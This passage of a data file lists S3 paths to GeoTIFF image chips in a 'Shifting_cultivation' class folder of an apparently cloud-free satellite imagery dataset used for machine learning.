's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_700_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_800_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_1900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/52/52_900_900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1000_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1100_3600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1300_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1400_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1400_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1400_4900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1500_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1500_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1500_4900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1600_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1600_4800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1600_4900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1800_4600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_1900_4600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_4600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2000_4700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2400_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2500_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2600_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2600_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2700_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2800_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_2900_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4300.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3000_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3100_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3200_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3300_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3300_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3300_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3400_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3500_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3600_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_3700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_3800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3700_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3800_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2600.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_3900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_3900_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4000_4500.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4100_4400.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4200_2700.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4200_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4200_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4300_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4300_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4400_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4400_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4400_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_2800.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4500_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4600_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_2900.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_3000.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_3100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_3200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_4100.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4700_4200.tif', 's3://canopy-production-ml/chips/cloudfree-merge-polygons/dataset_v2/Shifting_cultivation/100/92/92_4800_3000.tif', 